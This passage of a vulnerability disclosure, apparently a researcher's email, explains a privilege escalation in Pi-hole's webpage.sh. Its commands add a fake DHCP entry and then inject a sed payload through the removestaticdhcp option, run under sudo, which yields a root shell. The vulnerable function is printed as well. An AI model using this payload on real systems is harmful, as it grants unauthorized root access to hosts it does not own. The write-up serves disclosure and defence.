    [CUT BY COMPASS]
    
     
    
    main() {
    
        args=("$@")
    
     
    
        case "${args[1]}" in
    
    [CUT BY COMPASS]
    
            "addcustomdns"        ) AddCustomDNSAddress;;
    
            "removecustomdns"     ) RemoveCustomDNSAddress;;
    
            "addcustomcname"      ) AddCustomCNAMERecord;;
    
            "removecustomcname"   ) RemoveCustomCNAMERecord;;
    
            *                     ) helpFunc;;
    
        Esac
    

**3rd Privilege Escalation**

The same vulnerability is present in the removestaticdhcp option. This exploit works only if the file /etc/dnsmasq.d/04-pihole-static-dhcp.conf is not empty.

Showing that the current user is www-data (it is possible to use any other low-privilege user with the same sudo configuration as the www-data user):

The file 04-pihole-static-dhcp.conf does not exist:

    $ ls -l /etc/dnsmasq.d/04-pihole-static-dhcp.conf
    
    ls: cannot access '/etc/dnsmasq.d/04-pihole-static-dhcp.conf': No such file or directory
    

Add a fake entry inside the file 04-pihole-static-dhcp.conf:

    $ sudo /usr/local/bin/pihole -a addstaticdhcp 'ff:ff:ff:ff:ff:ff' '10.10.10.10'
    

Check if the entry has been added to the file:

    $ cat /etc/dnsmasq.d/04-pihole-static-dhcp.conf
    
    dhcp-host=ff:ff:ff:ff:ff:ff,10.10.10.10,
    

Run the pihole script using the malicious payload to spawn a root shell:

    $ sudo /usr/local/bin/pihole -a removestaticdhcp 'a/d ; 1e exec sh 1>&0 ; /'
    
    # id
    
    uid=0(root) gid=0(root) groups=0(root)
    
    #
    

The security issue resides in the RemoveDHCPStaticAddress function of the /opt/pihole/webpage.sh where the mac variable is taken from the input and not validated before being used in the sed command:

    RemoveDHCPStaticAddress() {
    
        mac="${args[2]}"
    
        sed -i "/dhcp-host=${mac}.*/d" "${dhcpstaticconfig}"
    
    }
    
     
    
    [CUT BY COMPASS]
    
     
    
    main() {
    
        args=("$@")
    
     
    
        case "${args[1]}" in
    
    [CUT BY COMPASS]
    
            "removestaticdhcp"    ) RemoveDHCPStaticAddress;;
    
    [CUT BY COMPASS]
    
        esac
    

Please let me know if you have any questions.

Regards,

Emanuele Barbeno

Search

lenovo warranty check/lookup | check warranty status | lenovo support us